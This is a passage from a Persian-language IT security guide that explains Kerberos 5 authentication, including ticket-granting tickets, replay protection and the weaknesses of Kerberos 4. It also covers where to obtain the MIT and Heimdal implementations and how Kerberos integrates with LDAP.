ﻣﻲﺧﻮﺍﻫﺪ ﻣﺠﺪﺩﹰﺍ ﺑﺮﺍﻱ ﻭﺍﺭﺩ ﻛﺮﺩﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺻﺤﻴﺢ ﺗﻼﺵ ﻛﻨﻴﺪ.
ﺩﺭ ،Kerberos 5ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻗﺒﻞ ﺍﺯ ﺗﻤﺎﺱ ﺑﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﻨﺘﻈﺮ ﻣﻲﻣﺎﻧﺪ ﺗﺎ ﺷﻤﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻛﻨﻴﺪ .ﺁﻧﮕﺎﻩ ﻳـﻚ ﭘﻴـﺎﻡ
ﺣﺎﻭﻱ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﻭ ﺗﺎﺭﻳﺦ ﻫﻤﺎﻧﺮﻭﺯ -ﻛﻪ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷـﺪﻩ -ﺑـﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ Kerberos
ﻣﻲﻓﺮﺳﺘﺪ .ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺪﻧﺒﺎﻝ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﺷﻤﺎ ﻣﻲﮔﺮﺩﺩ ،ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﻣﻲﻳﺎﺑﺪ ،ﻭ ﺗﻼﺵ ﻣﻲﻛﻨـﺪ ﺗـﺎﺭﻳﺦ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺭﺍ
ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ .ﺍﮔﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺘﻮﺍﻧﺪ ﺗﺎﺭﻳﺦ ﺍﺭﺳﺎﻟﻲ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ )ﻛﻪ ﻃﺒﻴﻌﺘﹰﺎ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺁﻥ ﺗﺎﺭﻳﺦ ،ﺗﺎﺭﻳﺦ ﻫﻤﺎﻧﺮﻭﺯ ﺧﻮﺍﻫﺪ ﺑـﻮﺩ( ﺁﻧﮕـﺎﻩ
١٧٦
ﻳﻚ ﺑﻠﻴﻂ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ ،ﺁﻧﺮﺍ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭﺗﺎﻥ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﺪ ،ﻭ ﺳﭙﺲ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﻲﻓﺮﺳﺘﺪ.
ﺑﻠﻴﻂ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﻳﻚ ﺑﻠﻮﻙ ﺩﺍﺩﻩ ﺍﺳﺖ ﺣﺎﻭﻱ ﻳﻚ ﻛﻠﻴﺪ ﻧﺸﺴﺖ ﻭ ﻳﻚ ﺑﻠﻴﻂ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲ ﺑﻠﻴﻂ ﺗـﺼﺪﻳﻖ ﺑﻠـﻴﻂ - Kerberosﻛـﻪ
ﻫﻢ ﺑﺎ ﻛﻠﻴﺪ ﻧﺸﺴﺖ ﻭ ﻫﻢ ﺑﺎ ﻛﻠﻴﺪ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ .ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ
ﺑﻠﻴﻂ Kerberosﺗﻤﺎﺱ ﺑﮕﻴﺮﺩ ﺗﺎ ﺑﺮﺍﻱ ﻫﺮ ﻣﻮﻛﻞ ﺩﺭﻭﻥ ﻗﻠﻤﺮﻭﻱ - Kerberosﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎ ﻭ ﻛـﺎﺭﺑﺮﺍﻧﻲ ﻛـﻪ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﺁﻧﻬﺎ ﺭﺍ ﻣﻲﺷﻨﺎﺳﺪ -ﺑﻠﻴﻂ ﺑﺪﺳﺖ ﺁﻭﺭﺩ.
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻭﻗﺘﻲ ﻛﺎﺭﺑﺮ ﺑﺮﺍﻱ ﺑﺎﺭ ﺍﻭﻝ ﺗﻼﺵ ﻣﻲﻛﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ Kerberosﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﺩﺳﺘﺮﺳﻲ ﭘﻴـﺪﺍ ﻛﻨـﺪ،
ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﻴﺴﺘﻢ ﺭﻭﻱ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺑﺎ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺗﻤﺎﺱ ﻣﻲﮔﻴـﺮﺩ ﻭ ﺗﻘﺎﺿـﺎﻱ ﻳـﻚ ﺑﻠـﻴﻂ ﺑـﺮﺍﻱ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻓﺎﻳـﻞ
ﻣﻲﻓﺮﺳﺘﺪ .ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺑﻪ ﻛﺎﺭﺑﺮ ﻳﻚ ﺑﻠﻴﻂ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻓﺎﻳﻞ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺍﻧﺪ .ﺑﻠﻴﻂ ﻓﺮﺳﺘﺎﺩﻩ ﺷـﺪﻩ ﺣـﺎﻭﻱ ﻳـﻚ ﺑﻠـﻴﻂ
ﺩﻳﮕﺮ ﺍﺳﺖ ،ﻛﻪ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻓﺎﻳﻞ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺍﺳﺖ ،ﻭ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺩﺭﺧﻮﺍﺳﺖ ﻓﺎﻳﻠﻬﺎ ﺁﻧـﺮﺍ ﺑـﻪ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻓﺎﻳﻞ ﺍﺭﺍﺋﻪ ﻛﻨﺪ .ﺑﻠﻴﻂ ﻳﺎﺩﺷﺪﻩ ﺣﺎﻭﻱ ﻧﺎﻡ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﺓ ﻛﺎﺭﺑﺮ ،ﺯﻣﺎﻥ ﺍﻧﻘﻀﺎ ﻭ ﺁﺩﺭﺱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﻳﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ ﻛـﺎﺭﺑﺮ
ﺍﺳﺖ .ﺳﭙﺲ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﺎﺭﺑﺮ ﺍﻳﻦ ﺑﻠﻴﻂ ﺭﺍ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻓﺎﻳﻞ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ .ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻓﺎﻳﻞ ﺑﻠﻴﻂ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭ
ﺧﻮﺩ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻛﻨﺪ ،ﻭ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﻳﻚ ﻧﮕﺎﺷﺖ ﻣﻴﺎﻥ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﺎﺭﺑﺮ ) ،UIDﺁﺩﺭﺱ (IPﻭ ﻳﻚ UIDﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﻓﺎﻳـﻞ
ﻣﻲﺳﺎﺯﺩ Kerberos .ﺯﻣﺎﻥ ﺭﻭﺯ ﺭﺍ ﺩﺭ ﺗﻘﺎﺿﺎﻫﺎ ﻣﻲﮔﺬﺍﺭﺩ ﺗﺎ ﺍﺯ ﺩﺯﺩﻳﺪﻩ ﺷﺪﻥ ﻳﻚ ﺗﻘﺎﺿﺎ ﻭ ﺍﻧﺘﻘﺎﻝ ﺁﻥ ﺍﺯ ﻣﻴﺰﺑﺎﻥ ﻣﺸﺎﺑﻪ ﺩﺭ ﺯﻣﺎﻧﻬـﺎﻱ ﺑﻌـﺪ
)ﻣﺜ ﹰﻼ ﺩﺭ ﻳﻚ ﺣﻤﻠﻪ ﺗﻜﺮﺍﺭ ﺗﻮﺳﻂ ﻳﻚ ﻣﻬﺎﺟﻢ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻛﻨﻨﺪﻩ( ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ.
۱۷۵ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻣﻘﺎﻻﺕ ﻭ ﺍﺳﻨﺎﺩ ،kerberosﺍﺯ ﻧﻈﺮ ﻣﻨﻄﻘﻲ ﺩﻭ ﻧﻮﻉ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ kerberosﻭﺟﻮﺩ ﺩﺍﺭﺩ :ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ،ﻭ ﺳﺮﻭﻳﺲ ﺗـﺼﺪﻳﻖ ﺑﻠـﻴﻂ.
ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ﻓﻜﺮ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺍﻳﻦ ﺗﻠﻘﻲ ﺩﻗﻴﻖ ﻧﻴﺴﺖ ،ﭼﻮﻥ ﻫﻤﻪ ﺳﻴﺴﺘﻢ kerberosﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜـﻲ ﺗﻨﻬـﺎ ﻳـﻚ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ -ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ
،kerberosﻳﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻛﻠﻴﺪ -ﺭﺍ ﺑﻜﺎﺭ ﻣﻲﮔﻴﺮﺩ.
۱۷۶ﭼﺮﺍ ﭘﺮﻭﺗﻜﻞ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺖ؟ Kerberos 4ﺗﻼﺵ ﻣﻲﻛﺮﺩ ﺗﻌﺪﺍﺩ ﺩﻓﻌﺎﺗﻲ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﺩﺭ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺫﺧﻴﺮﻩ ﻣﻲﺷﺪ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺑﺮﺳﺎﻧﺪ .ﻣﺘﺄﺳﻔﺎﻧﻪ ،ﺍﻳﻦ ﻣﺴﺌﻠﻪ
ﺑﺎﻋﺚ ﺷﺪ ﺑﺮﺍﺣﺘﻲ ﺑﺘﻮﺍﻥ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻠﻴﻂ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ Kerberso 4ﺭﺍ ﺑﺼﻮﺭﺕ offlineﺣﺪﺱ ﺯﺩ .ﺩﺭ Kerberos 5ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺑﺎﻳﺪ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ kerberosﻧﺸﺎﻥ ﺩﻫﺪ ﻛﻪ ﻛﺎﺭﺑﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺻﺤﻴﺢ ﺭﺍ ﻣﻲﺩﺍﻧﺪ .ﺍﻳﻦ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻣﻦﺗﺮ ﺍﺳﺖ ،ﻫﺮﭼﻨﺪ ﭼﻮﻥ ﺑﻠﻴﻂ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻛﺎﺭﺑﺮ ﺍﺯ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻪ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﺩ ،ﻟﺬﺍ ﻫﻤﭽﻨﺎﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻮﺳﻴﻠﻪ ﻳﻚ ﻣﻬﺎﺟﻢ ﺩﺯﺩﻳﺪﻩ ﺷﻮﺩ ﻭ ﺑﺎ ﻳﻚ ﺟﺴﺘﺠﻮﻱ ﻛﻠﻴﺪ ﻛﺎﻣﻞ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻭﺍﻗﻊ ﮔﺮﺩﺩ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٤٠
Kerberosﺍﺯ ﻧﻈﺮ ﺍﻣﻨﻴﺘﻲ ﭼﻨﺪ ﻣﺰﻳﺖ ﺩﺍﺭﺩ .ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﺠﺎﻱ ﺫﺧﻴـﺮﻩ ﺷـﺪﻥ ﺩﺭ ﺍﻳـﺴﺘﮕﺎﻫﻬﺎﻱ ﻛـﺎﺭﻱ ﻣﻨﻔـﺮﺩ ﺩﺭ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ
Kerberosﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﻧﺪ ﻭ ﻫﺮﮔﺰ ﺍﺯ ﺭﻭﻱ ﺷﺒﻜﻪ ﺍﻧﺘﻘﺎﻝ ﻧﻤﻲﻳﺎﺑﻨﺪ -ﺑﺼﻮﺭﺕ ﺭﻣﺰﺷﺪﻩ ﻳﺎ ﻫﺮ ﻃـﻮﺭ ﺩﻳﮕـﺮ .ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺗـﺼﺪﻳﻖ
ﻫﻮﻳﺖ Kerberosﻣﻲﺗﻮﺍﻧﺪ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮ ﺭﺍ ﺗﺼﺪﻳﻖ ﻛﻨﺪ ،ﭼﻮﻥ ﻛﺎﺭﺑﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻣﻲﺩﺍﻧﺪ ،ﻭ ﻫﻤﻴﻨﻄﻮﺭ ﻛﺎﺭﺑﺮ ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ﻫﻮﻳـﺖ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﺭﺍ ﺗﺼﺪﻳﻖ ﻛﻨﺪ ،ﭼﻮﻥ ﺁﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻫﻢ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﺭﺍ ﻣﻲﺩﺍﻧﺪ .ﭼﻮﻥ ﻛﺎﺭﺑﺮ ﻳﻚ ﺑﻠﻴﻂ ﺻﺎﺩﺭ ﺷـﺪﻩ
ﺑﻮﺳﻴﻠﺔ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺎ ﻛﻠﻴﺪ ﺳﺮﻭﻳﺲ ﻣﻘﺼﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺍﺳﺖ ﺧﺪﻣﺎﺕ ﺩﻳﮕﺮ Kerberosﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨـﺪ
ﻛﺎﺭﺑﺮ ﺭﺍ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﻨﺪ.
ﻛﺴﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻳﻚ ﺑﻠﻴﻂ ﺭﺍ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﻣـﻲﺩﺯﺩﺩ ﻧﻤـﻲﺗﻮﺍﻧـﺪ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﺪ ﭼـﻮﻥ ﺑـﺎ ﻛﻠﻴـﺪﻱ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ )ﻛﻠﻴﺪ ﻳﻚ ﺳﺮﻭﻳﺲ Kerberosﻭ ﻳﺎ ﺑﺪﺳﺖ ﺁﻣﺪﻩ ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ( ﻛﻪ ﻣﻬﺎﺟﻢ ﺁﻧﺮﺍ ﻧﻤﻲﺷﻨﺎﺳﺪ.
ﺗﻬﻴﺔ Kerberos
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻳﻤﻨﻲ Kerberosﻳﺎ ﻣﺸﺎﺑﻪ ﺁﻥ ﺍﻣﺮﻭﺯﻩ ﺍﺯ ﻃﺮﻳﻖ ﭼﻨﺪﻳﻦ ﺷـﺮﻛﺖ ﺍﺭﺍﺋـﻪ ﻣـﻲﺷـﻮﻧﺪ ،ﻭ ﻫﻤﭽﻨـﻴﻦ ﻳـﻚ ﻗـﺴﻤﺖ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ
ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻳﻲ ﻣﺜﻞ ،Mac OS X ،Solarisﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ Linuxﻭ BSDﺑﺸﻤﺎﺭ ﻣﻲﺁﻳﻨﺪ .ﺍﺯ Windows 2000ﺑﻪ
ﺑﻌﺪ ﺩﺭ Microsoft Windowsﻳﻚ ﻧﺴﺨﻪ ﺍﺯ Kerberos 5ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳـﺖ .ﻫﻤﭽﻨـﻴﻦ ﺍﻳـﻦ ﺍﻣﻜـﺎﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻣﻴـﺎﻥ
١٧٨
ﻣﺎﺷﻴﻨﻬﺎﻱ Unixﻭ ﺑﺴﺘﺮﻫﺎﻱ Windowsﺑﺘﻮﺍﻥ ﺍﺯ Kerberosﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
ﺍﮔﺮ ﺑﺎﻳﺪ Kerberosﺭﺍ ﺍﺯ ﺍﺑﺘﺪﺍ ﻧﺼﺐ ﻛﻨﻴﺪ ،ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ Kerberosﻣﺮﺑﻮﻁ ﺑﻪ MITﺑـﺮﺍﻱ ﺷـﻬﺮﻭﻧﺪﺍﻥ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﻭ ﻛﺎﻧـﺎﺩﺍ ﺩﺭ
ﺁﺩﺭﺱ http://web.mit.edu/kerberos/www/ﻭ ﺑـــﺮﺍﻱ ﺩﻳﮕـــﺮﺍﻥ ﺩﺭ ﺁﺩﺭﺱ http://www.crypto-publish.orgﻗﺎﺑـــﻞ
۱۷۷ﺩﺭ ﺑﻌﻀﻲ ﺍﺯ ﭘﻴﮑﺮﺑﻨﺪﻳﻬﺎ ﻣﻲﺗﻮﺍﻥ ﻳﻚ ﺣﺪﺍﻛﺜﺮ ﺯﻣﺎﻧﻲ ﺑﺮﺍﻱ ﻣﻌﺘﺒﺮ ﺑﺎﻗﻲ ﻣﺎﻧﺪﻥ ﻛﻠﻴﺪ ﺗﻌﻴﻴﻦ ﻛﺮﺩ.
۱۷۸ﺩﺭ ﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺗﻐﻴﻴﺮﺍﺕ ﺍﺧﺘﺼﺎﺻﻲ ﺑﻪ ﭘﺮﻭﺗﻜﻞ kerberosﺩﺍﺩﻩ ﻛﻪ ﺍﺛﺮ ﺁﻥ ﻣﺠﺒﻮﺭ ﻛﺮﺩﻥ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫـﺎﻱ Windowsﺑـﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
kerberosﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ Windowsﺍﺳﺖ .ﻟﺬﺍ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻣﺨﻠﻮﻁ Windowsﻭ ﻳﻮﻧﻴﻜﺲ ،ﺑﻬﺘﺮ ﺍﺳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ kerberosﻣﺎﺷـﻴﻨﻬﺎﻱ
Windows 2000ﺑﺎﺷﻨﺪ ﺗﺎ ﺑﺘﻮﺍﻥ ﻫﻢ ﺍﺯ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ Windowsﻭ ﻫﻢ ﺍﺯ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ Unixﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
٣٤١ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ .ﺩﺭ ﺍﻳﻦ ﺁﺩﺭﺳﻬﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺭﺗﻘﺎﻫﺎﻱ ﺭﺳﻤﻲ ،ﺍﺻﻼﺣﻬﺎ ،ﻭ ﺍﻃﻼﻋﻴـﻪﻫـﺎﻱ ﺍﻋـﻼﻡ ﻧﻘـﺎﻳﺺ ﺭﺍ ﻧﻴـﺰ ﺑﻴﺎﺑﻴـﺪ .ﺩﺭ Kerberos
ﭼﻨﺪﻳﻦ ﺍﺷﻜﺎﻝ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﻭﺟﻮﺩ ﺩﺍﺷﺖ؛ ﻟﺬﺍ ﺑﺴﻴﺎﺭ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺁﺧﺮﻳﻦ ﻧﺴﺨﺔ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﻫﻤﭽﻨﻴﻦ ﻳﻚ ﭘﻴﺎﺩﻩﺳـﺎﺯﻱ
ﺭﺍﻳﮕﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ Kerberosﺑﻪ ﻧﺎﻡ " "Heimdalﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺼﻮﺭﺕ ﭘﻮﻳﺎ ﺗﻮﺳﻌﻪ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ ﻭ ﺑـﺎ Kerberosﻣﺮﺑـﻮﻁ ﺑـﻪ MIT
ﻧﻴﺰ ﺑﺴﻴﺎﺭ ﺳﺎﺯﮔﺎﺭ ﺍﺳﺖ .ﻣﻲﺗﻮﺍﻧﻴـﺪ Heimdalﺭﺍ ﺍﺯ ﺁﺩﺭﺱ http://www.pdc.kth.se/heimdal/ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ .ﺗﻐﻴﻴـﺮﺍﺕ ﻻﺯﻡ ﺩﺭ
ﭘﻴﮑﺮﺑﻨﺪﻱ ﺑﺮﺍﻱ ﺳﺎﺯﮔﺎﺭﻱ Kerberosﺑﺎ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﻫﺴﺘﻨﺪ؛ ﺍﮔﺮ ﺧﻮﺩﺗﺎﻥ ﺑﺎﻳﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺍﻋﻤـﺎﻝ ﻛﻨﻴـﺪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﺮﺍﻱ
ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﺍﺳﻨﺎﺩ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺩﺭ ﺧﻮﺩ Kerberosﺭﺟﻮﻉ ﻧﻤﺎﻳﻴﺪ.
Kerberosﻭ LDAP
Kerberosﺑﺎ ) LDAPﻛﻪ ﺩﺭ ﻗﺴﻤﺖ ﺑﻌﺪﻱ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ( ﺑﺨﻮﺑﻲ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺗﺮﻛﻴﺐ ﻣﻲﺷﻮﻧﺪ Kerberos .ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ
ﻫﻮﻳﺖ ﻭ ﺍﻳﻤﻦ ﻛﺮﺩﻥ queryﻫﺎ ﻭ ﺍﺭﺗﻘﺎﻫﺎﻱ LDAPﺑﻜﺎﺭ ﺭﻭﺩ .ﺩﺭ ﻣﻘﺎﺑﻞ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ LDAPﻫـﻢ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﺭﺑﺮﺍﻥ ﻛـﻪ
ﭼﮕﺎﻟﺘﺮ ﺍﺯ ﺩﺍﺩﺓ ﺣﻔﺎﻇﺖﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﺗﻨﻬﺎ Kerberosﺍﺳﺖ -ﻣﺜﻞ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ ﺧﺎﻧﻪ ﻛﺎﺭﺑﺮ ،ﭘﻮﺳﺘﻪ ،ﺷـﻤﺎﺭﻩ ﺗﻠﻔـﻦ ،ﻳـﺎ ﺩﻳﮕـﺮ ﺍﻃﻼﻋـﺎﺕ
ﺳﺎﺯﻣﺎﻧﻲ -ﺭﺍ ﺫﺧﻴﺮﻩ ﻛﻨﺪ .ﺩﺭ ﻣﺠﻤﻮﻉ ،ﺍﻳﻦ ﺩﻭ ﺳﺮﻭﻳﺲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻫﻤﺔ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ NISﻭ NIS+ﺭﺍ ﺍﺭﺍﺋﻪ ﻛﻨﻨﺪ ﻭ ﺑـﻪ ﻫﻤـﻴﻦ ﺩﻟﻴـﻞ ﻫـﻢ
١٧٩
ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ.
ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ LDAPﺑﺮﺍﻱ ﺫﺧﻴﺮﻩ ﻛﺮﺩﻥ ﻛﻠﻴﺪﻫﺎﻱ Kerberosﺑﻜﺎﺭ ﻣـﻲﺭﻭﺩ .ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ Windowsﺍﺯ Kerberosﺍﺯ ﺧـﺪﻣﺎﺕ
